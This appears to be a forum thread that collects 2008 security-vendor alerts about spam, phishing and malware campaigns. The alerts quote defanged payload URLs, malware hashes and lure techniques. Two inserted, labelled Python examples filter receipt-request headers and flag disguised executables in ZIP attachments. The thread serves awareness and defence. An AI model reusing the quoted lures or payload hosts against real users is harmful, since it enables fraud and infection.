2008-09-03 (Symantec Security Response) - "...we have found that attackers have begun targeting free online service sites and our example is based on Google Notebook, although these attacks are not unique to this site. Attackers have started to use Google Notebook as a new social engineering attack vector to spread misleading applications. Misleading applications attempt to convince the user that he or she must remove potentially unwanted programs or security risks (usually nonexistent or fake) from the computer. Google Notebook is a free online service that provides a way to save and share information in a single location. This free service offers a feature to save search results, notes, or images online and allow users to share these artifacts with others. Users can create notes with headings and within each note they can add more content, such as links etc. Attackers are now taking advantage of this free service to create an attack vector to push misleading applications onto the victims' machines. While researching this problem we found cases where victims were invited to click on a malicious link. We found one author's notebook with more than 50 notes, including fake information and more malicious links... Clicking on the associated links leads to the author's notebook pages, where the pages contain fake information and malicious links... Based on the contents, the victim is invited to click on the links to get additional information, but ends up getting fake pop-up messages generated by fake Web sites hosting misleading applications... When the victim clicks the OK button, a fake antivirus installer is downloaded to the victim's machine. The link on the "Microsoft Windows History" page contains a link to "hxxp ://anitspy .com". This link will redirect the page to "hxxp ://llab .com". If it is a user's first visit to the site, then the site will redirect that Web page to a malicious Web site (hxxp ://pc .com), which serves up a misleading application.
In other instances the page will be redirected to a search site called "hxxp ://searcher .com," where the user will see an advertisement to download fake antivirus software. The complete scenario makes it seem as if attackers are running underground affiliate networks to promote misleading applications.
Social engineering attacks that involve victims who are tricked into clicking on malicious links are not new; however, now the attackers have started using free service sites as a new attack vector to push their misleading applications..."
(Screenshots available at the SecurityFocus URL above.)
:fear::mad:
AplusWebMaster
2008-09-09, 19:24
FYI...
SPAM campaign targeting US Presidential Election... Malicious Code
- http://securitylabs.websense.com/content/Alerts/3177.aspx
09.09.2008 - "Websense... has discovered an emerging email campaign which uses the US presidential election as a social engineering mechanism to install information-stealing code on a victim's machine. With less than 2 months before the start of the election, emails are circulating with fake news of a sex scandal affecting one of the candidates. Recipients of the email are encouraged to view a video supposedly involving the Democratic candidate Barack Obama. Users who click the link are shown a pornographic video taken from hxxp ://homemade*snip*.com/ . While the video plays for 14 seconds, malicious applications are installed on the victim's machine... The dropper installs 809.exe in the user's Temporary Internet Files folder. Also a Browser Helper Object (BHO) named Siemens32.dll is registered. This is an information-stealing application that posts data to a compromised Finnish travel site, hxxp ://*snip*-hotel.com/ ..."
(Screenshots available at the URL above.)
- http://www.f-secure.com/weblog/archives/00001497.html
September 10, 2008 - "...Interestingly, there is no Medved Hotel in Finland... we have reported this to local authorities and they are working on getting the site shut down."
(More screenshots...)
:fear::mad:
AplusWebMaster
2008-09-12, 13:32
FYI...
DHS email Scam
- http://www.us-cert.gov/current/index.html#dhs_email_scam
September 11, 2008 at 04:42 pm - "US-CERT is aware that spam email messages are being sent that appear to come from high-level DHS officials, some of which attempt to entice the user into an advance fee fraud scam. In some cases, the sender's address has been spoofed so that the email appears to come from a legitimate dhs.gov address..."
:fear::mad:
AplusWebMaster
2008-09-15, 20:45
FYI...
Fake Postcards... Fake Hurricane Relief Web Site
- http://blog.trendmicro.com/fake-postcards-lead-to-fake-hurricane-relief-web-site/
Sep. 14, 2008 - "... The Hurricane Gustav connection is not really that apparent in the following spammed email message... It informs recipients that they received a postcard, and if they desire to view it, they should click either of the two links in the message body. Recipients who are lured into believing that some family member actually has sent them a postcard are redirected to the following Web page when they click either link... The nameless family member (one would immediately notice that this is so impersonal) who sent the postcard also wants the recipient to donate to Gustav victims. A well-crafted “postcard” and a chance to help people in need, how heartwarming! But only if there indeed was a legitimate card, and only if the money actually went to those affected by the hurricane. Even if the Web site says so, donations through this dubious channel do not go to Red Cross. The criminals behind this scam are the only ones who get to keep the money..."
(Screenshots available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-09-17, 15:48
FYI...
UPS tracking invoice trojan...
- http://isc.sans.org/diary.html?storyid=5051
Last Updated: 2008-09-16 20:15:52 UTC - "We received two reports of fake UPS invoice tracking Trojan zip files. This is similar to other invoice Trojans we have seen... notice that while this appears to be a two way conversation it was really just the spammer who created the whole thing. The victim did -not- send UPS an email..."
(More detail at the URL above.)
- http://www.ups.com/content/us/en/about/news/service_updates/virus_us.html
:fear:
AplusWebMaster
2008-09-21, 18:22
FYI...
Fake Careerbuilder sites/phish...
- http://asert.arbornetworks.com/2008/09/busy-friday-careerbuilder-iran-and-burma/
September 19, 2008 - "...new fast flux phishing malcode delivery scheme targeting CareerBuilder. Lures bring you in to a number of sites and launch malcode onto your system. Pretty classic technique these days, been used heavily for banks in the past couple of weeks... It’s a fast flux botnet, apparently doing double flux too... Much of that list comes from Gary Warner’s always excellent blog*. So, as many of you may be in the job market, keep in mind that not everything from CareerBuilder is really from them..."
* http://garwarner.blogspot.com/2008/09/careerbuilder-latest-digital.html
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2008-09-23, 06:21
FYI...
Facebook "add friend" Malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3185.aspx
09.22.2008 - "Websense... has discovered a new malicious social-engineering spam campaign masquerading as official emails sent by the popular Web 2.0 social-networking site, Facebook. The email is spoofed to appear from the domain facebookmail.com, an official domain used by Facebook for their outbound emails when notifying their users of an event. It is common for Facebook to send an email to notify their users when another Facebook user adds them as a friend on the social network. However, the spammers included a zip attachment that purports to contain a picture in order to entice the recipient to double-click on it. The attached file is actually a Trojan horse..."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2008-09-23, 17:48
FYI...
Wachovia... spy-phishing rootkit
- http://blog.trendmicro.com/wachovia-security-certificate-installs-rootkit/
Sep. 22, 2008 - "... spy-phishing scheme targeting the Fortune 500 company and 4th largest banking chain in the US, Wachovia Bank. This attack ends in the execution of a rootkit, TROJ_ROOTKIT.FX, which is a file that hides files and processes, allowing malicious attacks to run entirely beneath the radar.
Macalintal warns that he has seen the following subject headings used in this attack:
* Wachovia Connection Update Alert.
* Wachovia Connection Customer Support - Security Updates.
* Wachovia Connection upgrade warning.
* Wachovia Connection Emergency Alert System...
The malicious links download a file named SPlusWachoviadigicert.exe. Trend Micro Smart Protection Network detects this as TROJ_AGENT.AINZ. It accesses a certain URL to download another malware that in turn drops and installs TROJ_ROOTKIT.FX. This infection chain can be cut off at various points by the Smart Protection Network as we already detect the spam, the malicious links therein, and the files that are downloaded and executed on the system...
The legitimate Wachovia Security Plus link can be accessed here*, where the company discusses several security issues and precautionary methods to avoid being tricked by these types of attacks..."
* http://www.wachovia.com/securityplus/0,,,00.html
(Screenshot available at the TrendMicro URL above.)
:fear: :mad:
AplusWebMaster
2008-09-25, 06:33
FYI...
American Airlines phish...
- http://securitylabs.websense.com/content/Alerts/3187.aspx
09.23.2008 - "Websense... has discovered a new phishing campaign targeting American Airlines AAdvantage(R) Program customers. Users receive an email, which is spoofed, that tries to convince the user that, if they log in and fill out a 5-question survey, they will get a $50 reward. The email provides a link that takes visitors to the phishing Web site. The email also provides a fake code which is meant to entice the user even more..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-09-26, 16:17
FYI...
World War 3 SPAM
- http://sunbeltblog.blogspot.com/2008/09/world-war-3-spam.html
September 25, 2008 - "This is particularly nasty spam pushing a fake codec trojan... If you go to that link, you get to a very convincing site pushing a fake codec. That CNNWorld was created yesterday, hosted in Iran..."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2008-09-26, 21:40
FYI...
Bank fraud emails
- http://www.firstcybersecurity.com/main/news.asp#news1
25 September 2008 - "An increase in fraudulent activity is likely to follow the recent events in the banking sector... Customers with internet banking accounts are urged to take care if asked to respond to emails from banks which have been named as being involved in the recent takeovers and mergers. According to Director David Holman, “This is just the sort of confusion on which the fraudsters thrive. As these mergers and acquisitions continue in the banking sector, the consumer will expect to receive communications from their banks detailing name changes and giving them different websites to gain access to their internet bank accounts. Unless this is handled carefully it is a real opportunity for fraudsters to steal private information”. While many of us are wary of emails purporting to be from our banks, the latest APACs figures show that 18% of people who receive them still click through to links included in these (e)mails..."
- http://news.cnet.com/8301-1009_3-10051688-83.html
September 25, 2008
:fear:
AplusWebMaster
2008-09-30, 18:32
FYI...
Same WW3 SPAM... more detail
- http://blog.trendmicro.com/world-war-iii-malware-spam/
Sep. 29, 2008 - "...SPAM announcing the declaration of World War III. The link provided points to a legitimate-looking CNN page with a video. However, users wishing to view this video are prompted to install an ActiveX Object... The supposed ActiveX Object is actually malware, which Trend Micro detects as TSPY_BANCOS.JN. TSPY_BANCOS.JN, like all BANCOS variants, is an info stealer that monitors the browser of the affected system. It waits for the user to access certain banking-related Web sites, then spoofs the login pages of the bank Web site to steal sensitive account information. The request to install an ActiveX Object is a popular ploy to spread malware these days, and this bogus ActiveX Object is yet another one designed to deceive the user to believe that he’s installing something useful..."
(Screenshots available at the URL above.)
:fear:
AplusWebMaster
2008-10-01, 21:50
FYI...
- http://preview.tinyurl.com/4tksdr
Sep. 30, 2008 (TrendLabs) - "...recent report of -spammers- using a feature called ‘delivery receipt request’ to verify if a certain email address exists. Delivery receipts are messages sent to the original sender of an email message to verify that the sent message has been delivered to the intended recipient. While message delivery receipt acknowledgment is indeed available in popular desktop mail clients (such as Microsoft Outlook), and can be selectively ignored, most Web email platforms automatically send a delivery receipt when requested to do so if the targeted account exists. A Microsoft page stating instructions on how to enable & use this feature in various releases of Outlook can be seen here*. In enabling this function, spammers can now send spam to a large number of addresses and subsequently filter out the legitimate ones easily — that is, if the recipient chooses to selectively acknowledge each delivery request, or simply chooses to acknowledge all messages which have this request embedded. This unwillingly places a recipient on the spammer’s list of future victims just by acknowledging receipt of the initially sent spam. The delivery receipt function is ideally a useful feature especially for people who want to be absolutely sure that their message has been received. Unfortunately, this function, like so many other supposedly reputable functions, has been used for malicious intent instead..."
* http://support.microsoft.com/kb/192929
(In Outlook: >Tools >E-mail Options >Tracking Options - choose: "Never send a response")
:fear: :mad:
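The gateway-side counterpart to the Outlook setting above, as an added example that is not part of the original post or of TrendLabs' material: if the receipt-request headers never reach a client or webmail platform that auto-acknowledges, the sender learns nothing about whether the address is live. The sample messages, domain names and the "receipt goes to a different domain" heuristic are constructed assumptions for illustration.

```python
"""Strip receipt requests from inbound mail before a client can honour them."""
from email import message_from_string
from email.message import Message
from email.policy import default
from email.utils import parseaddr

# Header fields that ask the receiving client to send a receipt.
# Disposition-Notification-To is the standard MDN request (RFC 8098);
# the other two are older, client-specific variants some clients still honour.
RECEIPT_HEADERS = (
    "Disposition-Notification-To",
    "Return-Receipt-To",
    "X-Confirm-Reading-To",
)


def receipt_requests(msg: Message) -> dict:
    """Map each receipt-request header present in msg to its value."""
    return {h: str(msg[h]) for h in RECEIPT_HEADERS if msg[h] is not None}


def _domain(addr_header: str) -> str:
    """Lower-cased domain part of the first address in a header value."""
    return parseaddr(addr_header)[1].rpartition("@")[2].lower()


def receipt_goes_elsewhere(msg: Message) -> bool:
    """Assumed heuristic: a receipt requested for a domain other than the
    From: domain is worth flagging, since a genuine sender normally wants
    the acknowledgement delivered to themselves."""
    sender_domain = _domain(msg.get("From", ""))
    for value in receipt_requests(msg).values():
        target = _domain(value)
        if target and target != sender_domain:
            return True
    return False


def strip_receipt_requests(msg: Message) -> list:
    """Delete every receipt-request header in place; return the names removed."""
    removed = [h for h in RECEIPT_HEADERS if msg[h] is not None]
    for h in removed:
        del msg[h]
    return removed


def gateway_filter(raw: str) -> tuple:
    """Parse one raw RFC 5322 message, flag it, strip the request headers, and
    return (cleaned message text, removed header names, suspicious flag)."""
    msg = message_from_string(raw, policy=default)
    suspicious = receipt_goes_elsewhere(msg)
    removed = strip_receipt_requests(msg)
    return msg.as_string(), removed, suspicious


# Constructed sample: bulk mail asking for the receipt at a third domain.
SAMPLE_BULK = """From: Offers <promo@example-sender.test>
To: alice@example.org
Subject: Special offer
Disposition-Notification-To: collector@harvest.test
Return-Receipt-To: collector@harvest.test
Content-Type: text/plain; charset="us-ascii"

Click here for your prize.
"""

# Constructed sample: a colleague who genuinely wants to know the mail arrived.
SAMPLE_LEGIT = """From: Bob <bob@example.org>
To: alice@example.org
Subject: Contract draft
Disposition-Notification-To: bob@example.org
Content-Type: text/plain; charset="us-ascii"

Please confirm you received the draft.
"""

if __name__ == "__main__":
    for raw in (SAMPLE_BULK, SAMPLE_LEGIT):
        _, removed, suspicious = gateway_filter(raw)
        print("removed:", removed, "suspicious:", suspicious)
```

Both samples lose their receipt headers; only the bulk one is additionally flagged, so a gateway can strip unconditionally and reserve the flag for quarantine scoring.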
AplusWebMaster
2008-10-06, 18:01
FYI...
- http://blog.trendmicro.com/a-new-youtube-malware-tool/
Oct. 5, 2008 - "A new hacking tool circulating in the Internet now allows malicious users to create fake -YouTube- pages designed to deliver malware. The said tool, detected by Trend Micro as HKTL_FAKEYOUT, features a user-friendly console in Spanish that a hacker may use to create a pair of Web pages that look eerily identical to legitimate -YouTube- pages.
With a little crafty social engineering, unsuspecting users may be led into the first of the fake pages, INDEX.HTML. Here, users may be disappointed to see that they cannot view their video as they need a new version of Adobe Flash Player or some plugin or codec. A link is handily provided, and clicking the link leads users to the hacker’s file of choice, which could very possibly be something malicious. A second fake page informing users that the video they were trying to view cannot be shown is then displayed. This is to make users think that nothing’s really happened, when in fact by downloading the plugin, malware may already be running in their systems.
Fake codecs remain popular masks for malware. The popularity of -YouTube- also makes it a preferred target for malware users who want to infect more users... HKTL_FAKEYOUT could be very dangerous because it is very accessible to script kiddies who could use it for their malware and hacking operations. Users are advised to always check the URLs of pages they are viewing. Also, product updates should be downloaded from the vendors themselves to ensure that these are legitimate and not malicious."
Also see:
- http://voices.washingtonpost.com/securityfix/2008/09/fake_youtube_page_maker_helps.html
September 12, 2008
(Screenshots available at both URLs above.)
:fear: :mad:
AplusWebMaster
2008-10-13, 23:45
FYI...
Blogspot under push by malware authors
- http://sunbeltblog.blogspot.com/2008/10/blogspot-under-push-by-malware-authors.html
October 13, 2008 - "We’ve seen a number of new blogs on Blogspot today that push malware, pushing various search keywords...
Examples:
buzzwocdco. blogspot. com
iberianiceaande. blogspot. com
semtmbmshmenf. blogspot. com
These sites push fake codecs which generally make ones life quite miserable."
(Screenshot available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-10-14, 19:49
FYI...
MSN Messenger used as lure in malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3206.aspx
10.14.2008 - "Websense... has discovered a new malicious spam lure that uses the threat of a virus to encourage users to download a malicious Trojan. The email explains that by downloading the application linked within the email, users can protect themselves against a virus that spams messages to a user's contacts. The email offers an update to Live Messenger Plus - this is actually a Trojan (md5: 5F1D2521F6949F8B71B9FF93C17A8BE2). Antivirus detection rate is low... The URLs provided in the email redirect the user to a two-stage downloader named dsc.scr. As a distraction for the user, a dialog box is displayed explaining that the user will be redirected to msn.com.br. A browser then opens pointing to this site... A scheduled task is then created, and modifications are made to autoexec.bat to disable GBPlugin and other tools promoted by Brazilian banks to protect against such keyloggers and other malware..."
Hi5 "Add Friend" malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3205.aspx
10.13.2008 - "Websense... has discovered a new malicious, visual social-engineering spam campaign masquerading as official emails sent by the popular Web 2.0 social-networking site Hi5. The email comes in Spanish language, and is -spoofed- to appear as if it comes from the domain hi5.com, an official domain used by Hi5 for their outbound emails when notifying their users of an event. It is common for Hi5 to send an email to notify their users when another Hi5 user adds them as a friend on the social network. However, the spammers embedded malicious links and a fake friend photograph in order to entice the recipient to click on them, which leads to a download of a Trojan horse (md5: 5f6b089f0048e6510c78bb38a3909b9c). The malicious application aims to steal confidential logins for a popular Mexican bank. A-V detection of this banker Trojan is low... A fake Hi5 friend request is included in the body of the email. We have previously alerted on a similar attack relating to Facebook "add friend" Malicious Spam. This clearly indicates that spammer and malware authors are increasingly targeting Web 2.0 sites to carry out their attacks..."
(Screenshots available at both URLs above.)
:fear::fear:
AplusWebMaster
2008-10-20, 23:08
FYI...
Bogus spammed email eTickets - Continental Airlines...
- http://blog.trendmicro.com/your-eticket-makes-a-worm-fly/
October 20, 2008 - "...Be careful when booking flights online or opening emails about your “online flight ticket”—or you could crash-land on a heap of malware trouble. TrendLabs researchers caught spammed email messages featuring bogus eTickets supposedly from Continental Airlines, the fourth-largest airline in the U.S. The message thanks the recipient for availing of a new service called “Buy flight ticket Online” and provides account details (even a password). Then it makes the recipient simply print out the attached “purchase invoice and plane ticket” before they use these, and they’re off! How convenient!... The attachment is named E-TICKET.ZIP, which in turn contains the file E-TICKET.DOC.EXE. “It’s the old double-extension trick to hopefully fool the user to double-click the attachment”... Trend Micro detects the file contained in the zipped attachment as WORM_AUTORUN.CTO. This worm propagates via removable drives and accesses websites to download other possibly malicious files. It also displays the icon of files related to Microsoft Word to avoid easy detection and consequent removal... The phrase "Your credit card has been charged" will just add more worry for the user, convincing him more to examine (read: double-click) the ‘flight details’... This seems to be a renewed campaign, as we first saw it in late August — only the featured airline then was Northwest Airlines, and the spam attachment led to rogue AV installation instead of a worm. Since then, the transaction fee has gone up; Northwest supposedly charged almost $700 while Continental about $915. And JetBlue Airways, it would seem, “charged” even more..."
(Screenshots available at the URL above.)
:mad:
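A mail-filter check for the attachment tricks described in this post and in the Facebook "add friend" post above, as an added example that is neither Trend Micro's nor Websense's code: it opens a ZIP attachment and flags members that use the double-extension trick (E-TICKET.DOC.EXE), that carry a plainly executable extension, or that start with a Windows PE header despite a picture or document name. The archives and the two-byte "MZ" stand-in for a real executable are constructed samples; the extension lists are assumptions.

```python
"""Inspect a ZIP mail attachment for disguised executables."""
import io
import zipfile

# Extensions Windows will execute on double-click (assumed list, not exhaustive).
EXEC_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js"}
# Extensions used as the "decoy" half of a double extension (assumed list).
DECOY_EXTENSIONS = {"doc", "pdf", "jpg", "jpeg", "txt", "xls", "htm", "html"}


def double_extension(name: str) -> bool:
    """True for names like E-TICKET.DOC.EXE: decoy extension then executable."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 3:
        return False
    return parts[-1] in EXEC_EXTENSIONS and parts[-2] in DECOY_EXTENSIONS


def looks_like_pe(head: bytes) -> bool:
    """PE (EXE/DLL/SCR) files begin with the DOS 'MZ' signature."""
    return head[:2] == b"MZ"


def inspect_zip_attachment(data: bytes) -> list:
    """Return (member name, reason) findings for every suspicious member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            base = name.lower().rsplit("/", 1)[-1]
            ext = base.rsplit(".", 1)[-1] if "." in base else ""
            with zf.open(info) as fh:
                head = fh.read(2)  # only the signature is needed
            if double_extension(name):
                findings.append((name, "double extension hides executable"))
            elif ext in EXEC_EXTENSIONS:
                findings.append((name, "executable attachment"))
            elif looks_like_pe(head):
                findings.append((name, "PE header under non-executable name"))
    return findings


def build_sample_zip(members: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes}; used only for the samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples. FAKE_PE is just an 'MZ' signature plus padding.
FAKE_PE = b"MZ" + b"\x00" * 62
SAMPLE_ETICKET = build_sample_zip({"E-TICKET.DOC.EXE": FAKE_PE})
SAMPLE_PHOTO = build_sample_zip({"photo.jpg": FAKE_PE})   # renamed executable
SAMPLE_SCR = build_sample_zip({"dsc.scr": FAKE_PE})
SAMPLE_CLEAN = build_sample_zip({"invoice.txt": b"Thank you for your order."})

if __name__ == "__main__":
    for label, blob in (("eticket", SAMPLE_ETICKET), ("photo", SAMPLE_PHOTO),
                        ("scr", SAMPLE_SCR), ("clean", SAMPLE_CLEAN)):
        print(label, inspect_zip_attachment(blob))
```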
AplusWebMaster
2008-10-23, 08:01
FYI...
Malicious BBB Certificate SPAM
- http://securitylabs.websense.com/content/Alerts/3213.aspx
10.22.2008 - "Websense... has discovered another round of malicious BBB spam today. The spam contains a spoofed -From- address to look as if the message was sent by the Better Business Bureau. The message uses social engineering tactics to entice readers to follow a link in the message in order to "register new software and update contact information". We have seen tens of thousands of these messages coming in since noon today. Also of note is that, from the format of these messages and the resulting links, this looks like it was done by the same group that has been spamming out malicious phishes targeting customers of Bank of America, Wachovia, Royal Bank, and others. Clicking on the link takes the victim to a page which -looks- like the BBB site. The site stresses that a digital certificate should be used while browsing the BBB site. It then provides a prompt to download a file called "TrustedBBBCertificate.exe" which is actually a Trojan Downloader (SHA-1 dcefc1fb912d7bb536de3e66d9c5c6c8465f0790). When this file is executed, it takes the victim to another Web page, which is hosted on another malicious domain, for the "Certificate Registration". This secondary site also tries to get the victim to download "TrustedBBBCertificate.exe"..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2008-10-31, 23:31
FYI...
Malicious Website/Malicious Code - Halloween-themed websites
- http://securitylabs.websense.com/content/Alerts/3223.aspx
10.31.2008 - "Websense... has discovered that numerous Halloween-themed Web sites have been compromised as Halloween approaches and users are more likely to visit. One particular example is a Web site selling Halloween costumes. The deobfuscation returned by ThreatSeeker shows that the JavaScript has multiple layers of obfuscation. The script contacts a malicious server in the .biz TLD. Within the ThreatSeeker network, we have seen almost ten thousand sites infected with the same obfuscation technique. Another example is a US-based retailer using the Halloween theme to promote its products. This Web site is infected with a redirection that points to a gpack exploit kit. The ThreatSeeker network is currently tracking over thirteen-thousand sites infected with these patterns... Not only malware authors take advantage of seasonal events. Numerous recently registered proxy Web sites are using the Halloween theme to allow users to bypass traditional URL filtering solutions..."
(Screenshots available at the URL above.)
:fear:
AplusWebMaster
2008-11-05, 18:02
FYI...
Election result SPAM malware
- http://securitylabs.websense.com/content/Alerts/3229.aspx
11.05.2008 - "Websense... has discovered that malware authors are capitalizing on the recently announced results of the 2008 US Presidential election. Malicious email lures are being sent promising a video showing an interview with the advisors to the recently elected US President. The email actually contains links to a file called 'BarackObama.exe' hosted on a compromised travel site at hxxp://*snip*.com/web/BarackObama.exe. This file is a Trojan Downloader with MD5 9720d70a5da9ca442ecf41e9269f5a27. Upon execution files called system.exe and firewall.exe are dropped into the system directory. A phishing kit is unpacked locally, and the dropped files are bound to startup. The hosts file is also modified. Major anti-virus vendors* are not detecting this Trojan Horse..."
(Screenshots available at the URL above.)
* http://www.virustotal.com/analisis/f080362c4fa67d5c69b58053a00bc4e2
11.05.2008 19:58:04 (CET) - Result: 14/36 (38.89%)
Per: http://voices.washingtonpost.com/securityfix/2008/11/malware_piggybacks_on_obama_wi.html
:fear:
AplusWebMaster
2008-11-05, 21:15
Same (kind of) stuff, same day...
Election result SPAM malware #2
- http://securitylabs.websense.com/content/Alerts/3230.aspx
11.05.2008 - "... further activity from malware authors using the news of the U.S. Presidential campaign outcome as bait to attract users into executing malicious executables. So far we have over 25,000 emails through our systems... In a very quick response to the outcome of the U.S. Presidential attacks we have now seen both localized and globalized attacks... Clicking on the link leads the user to a purposely registered domain which advises the user that they need to install the latest version of Adobe Flash player before the video can be viewed. The malicious Web site actually links to a file called 'adobe_flash.exe' with MD5 47C86509A78DC1EDB42F2964BEA86306. This is a Trojan Downloader packed with ASPack. Upon execution, a RootKit is installed on the compromised machine, and data is sent to multiple command and control servers..."
Also see:
- http://garwarner.blogspot.com/2008/11/computer-virus-masquerades-as-obama.html
November 05, 2008
- http://www.f-secure.com/weblog/archives/00001530.html
November 5, 2008
- http://sunbeltblog.blogspot.com/2008/11/blizzard-of-us-presidential-malware.html
11.05.2008
(Screenshots available at all URLs above.)
:fear::mad:
AplusWebMaster
2008-11-08, 00:31
FYI...
- http://securitylabs.websense.com/content/Alerts/3233.aspx
11.07.2008 - "Websense... has discovered that the Koobface social networking worm is again spreading on Facebook... email reveals that infected user accounts are being used to post messages to Facebook friends lists. The content was an enticing message with a link that used a Facebook open redirector. When recipients click the link, they are automatically redirected multiple times, finally reaching a site masquerading as YouTube that serves a malicious Trojan downloader..."
(Screenshots available at the URL above.)
:fear::fear:
AplusWebMaster
2008-11-10, 14:10
FYI...
SPAM from ‘US Treasury’ ...redirects to malicious sites
- http://blog.trendmicro.com/us-treasury-warns-of-phishing-redirects-to-malicious-sites/
November 9, 2008 | 11:52 pm - "Spammed email messages -supposedly- from The United States Federal Reserve Bank warn their recipients of a “large-scaled phishing attack” affecting several banks and credit unions... The email message gives details on the supposed phishing attack and adds that the US Treasury Department has also monitored a high level of illegal wire transfers. Having told recipients that, the email message then informs them of restrictions imposed on federal wire transfers as part of security measures being taken by concerned government agencies. The message helpfully gives some links where users can get more detailed information. But instead of being directed to a legitimate website, those who click are led to .org domains with names completely different from the websites of the Federal Reserve Bank, the Treasury Department, or the Federal Deposit Insurance Corporation... Other related attacks that use the names of legitimate government organizations or mask themselves as security measures include the following:
* ‘Treasury Optimizer’ Updates Systems With Malware
* Storm Goes Economic
* Fake IRS Web Sites Found (Again)
Users are advised to refrain from clicking links in unsolicited email messages. It is best to go directly to the website of the concerned organization for more information..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-11-13, 22:08
FYI...
SPAM - huge drops with McColo demise...
- http://marshal.com/trace/traceitem.asp?article=815
November 13, 2008 - "Yesterday, McColo Corp, the company responsible for hosting the control servers for several of the biggest spam botnets, was taken offline*. Srizbi, Rustock, Mega-D and Pushdo botnets, as well as several others, all had control servers hosted on McColo’s network. Last week these four botnets accounted for over 80 percent of all spam. In addition to botnet control servers, McColo was also known to host malicious software, fake antivirus and child pornography websites... Today, spam has significantly decreased and three of the major botnets, Mega-D, Srizbi and Rustock, have almost completely stopped sending spam. Our daily spam volume index showed a massive drop over the last two days... We do not expect this drop in spam to continue for long; often the people or groups responsible for the malicious activity simply move to a new host and continue as normal. Nevertheless, such a dramatic decline in spam, however short-lived, is good news indeed and represents another blow for the cyber criminals."
* http://asert.arbornetworks.com/2008/11/third-bad-isp-dissolves-mccolo-gone/
November 12, 2008
> http://hostexploit.com/downloads/Hostexploit%20Cyber%20Crime%20USA%20v%202.0%201108.pdf
- http://blog.trendmicro.com/spam-volume-plummets-as-isps-pull-the-plug-on-mccolo/
Nov. 15, 2008 - "...This small victory will most likely be short-lived, as it is almost certain that these obviously profitable criminal operations are too valuable for these criminal operations to be abandoned..."
:fear:
AplusWebMaster
2008-11-20, 05:52
FYI...
- http://blog.trendmicro.com/paypal-spam-warns-of-fraud-installs-worm-instead/
Nov. 18, 2008 - "A new fake PayPal email message is being spammed — this time, it is not the typical PayPal phishing email that everyone is accustomed to. Instead of including links asking for the recipient’s personal information, this spammed message asks users to open a .ZIP attachment... It informs recipients that their PayPal accounts were hacked, and that some fraudulent activity may have occurred. As part of security measures, “PayPal” is asking users to review the “report” in the .ZIP file and then contact the company if anything unusual is discovered. The attachment that arrives with this spam, however, does not contain a report or any similar information. Inside the .ZIP archive is a worm that infects the recipient’s computer upon execution..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2008-11-26, 20:38
FYI...
- http://securitylabs.websense.com/content/Blogs/3245.aspx
11.26.2008 - "As we wish our American colleagues and friends 'Happy Thanksgiving', we could be tempted to get into the spirit and maybe brighten up our desktop with screensavers, wallpapers and the like. Our advice to users is to exercise caution - such activity may lead to adware, BHOs, and other undesirables... We found examples of Thanksgiving-themed screensavers leading to Potentially Unwanted Software (PUS) in the form of browser toolbars (BHO), as well as changes to your home page, and personal data being harvested... no such thing as a free lunch, even on Thanksgiving..."
(Screenshots available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-11-28, 14:28
FYI...
- http://asert.arbornetworks.com/2008/11/this-bofa-demo-thing-got-big-fast/
November 27, 2008 - "The Obama spam and malcode gang is back at it with a new fast flux phishing and malcode ruse. This time it’s a demo from the Bank of America that requires the classic “Flash Upgrade”. At the peak I was seeing 400 unique URLs for this run an hour. The URLs were unique strings, possibly for tracking purposes or possibly to stress URL blacklists. But, when you look more closely you see they are just a handful of domain names. This is a lot like the Rock Phish of old. The malcode download routine is very typical. If you don’t follow the lure, a meta-refresh will get ya... The malcode is tiny, but downloads hxxp ://silviocash .com/usp.exe, aka Paparus or Urlsnif. Driver file, rootkitted, and now the box will send info from IE (ie form data) to the hacker. Owned..."
* http://garwarner.blogspot.com/2008/11/bank-of-america-demo-account-do-not.html
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2008-11-29, 20:22
FYI... :santa:
- http://securitylabs.websense.com/content/Alerts/3248.aspx
11.27.2008 - "Websense... has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns. The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com TLD space. Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-11-30, 14:35
FYI... more holiday SCAMS...
- http://blog.trendmicro.com/getting-a-taste-of-mcdonalds-phish-fillet/
Nov. 29, 2008 - "Phishers always think out of the box, thinking of ways to fool victims into falling for their phishing schemes. Now... we’ve found a new twist - one that involves the popular fast-food chain McDonald’s. The phishing page displays a fake Member Satisfaction Survey, and for the customer to take the bait, it promises $75 credit to the customer’s account..."
- http://blog.trendmicro.com/new-gpcode-trojan-holds-victims-files-hostage/
